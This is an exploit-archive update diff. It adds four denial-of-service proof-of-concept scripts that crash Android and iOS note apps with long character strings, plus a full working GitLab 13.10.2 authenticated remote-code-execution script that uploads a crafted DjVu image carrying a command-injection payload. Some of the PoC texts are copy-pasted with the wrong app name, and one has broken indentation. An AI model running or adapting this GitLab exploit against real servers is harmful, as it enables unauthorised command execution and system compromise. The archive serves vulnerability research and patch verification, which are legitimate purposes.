DB: 2021-06-05

6 changes to exploits/shellcodes

Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
Color Notes 1.4 - Denial of Service (PoC)
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
My Notes Safe 5.3 - Denial of Service (PoC)
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
Gitlab 13.10.2 - Remote Code Execution (Authenticated)

exploits/android/dos/49946.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
+# Date: 2021-06-03
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
+# Version: 4.3.61
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 50000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/ios/dos/49952.py

@@ -0,0 +1,35 @@
+# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
+# Version: 1.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")

exploits/ios/dos/49953.py

@@ -0,0 +1,35 @@
+# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
+# Version: 5.5
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/ios/dos/49954.py

@@ -0,0 +1,35 @@
+# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
+# Version: 5.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/ruby/webapps/49951.py

@@ -0,0 +1,99 @@
+# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
+# Date: 04/06/2021
+# Exploit Author: enox
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/
+# Version: < 13.10.3
+# Tested On: Ubuntu 20.04
+# Environment: Gitlab 13.10.2 CE
+# Credits: https://hackerone.com/reports/1154542
+
+import requests
+from bs4 import BeautifulSoup
+import random
+import os
+import argparse
+
+parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
+parser.add_argument('-u', help='Username', required=True)
+parser.add_argument('-p', help='Password', required=True)
+parser.add_argument('-c', help='Command', required=True)
+parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.t
+command = args.c
+
+session = requests.Session()
+
+# Authenticating
+print("[1] Authenticating")
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+login_form = {
+    "authenticity_token": token,
+    "user[login]": username,
+    "user[password]": password,
+    "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+    exit(f"Login Failed:{r.text}")
+else:
+    print("Successfully Authenticated")
+
+
+# payload creation
+print("[2] Creating Payload ")
+
+payload = f"\" . qx{{{command}}} . \\\n"
+f1 = open("/tmp/exploit","w")
+f1.write('(metadata\n')
+f1.write('        (Copyright "\\\n')
+f1.write(payload)
+f1.write('" b ") )')
+f1.close()
+
+# Checking if djvumake is installed
+check = os.popen('which djvumake').read()
+if (check == ""):
+    exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
+
+# Building the payload
+os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')
+
+
+# Uploading it 
+print("[3] Creating Snippet and Uploading")
+
+# Getting the CSRF token
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+csrf = soup.findAll('meta')[16].get("content")
+
+
+cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
+    'Accept': 'application/json',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Referer': f'{gitlab_url}/projects',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1',
+    'X-Requested-With': 'XMLHttpRequest',
+    'X-CSRF-Token': f'{csrf}'
+}
+files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
+
+r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
+
+if r.text != "Failed to process image\n":
+    exit("[-] Exploit failed")
+else:
+    print("[+] RCE Triggered !!")

files_exploits.csv

@@ -6789,6 +6789,10 @@ id,file,description,date,author,type,platform,port
 49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android,
+49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -44107,3 +44111,5 @@ id,file,description,date,author,type,platform,port
 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php,
+49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",2021-06-04,enox,webapps,ruby,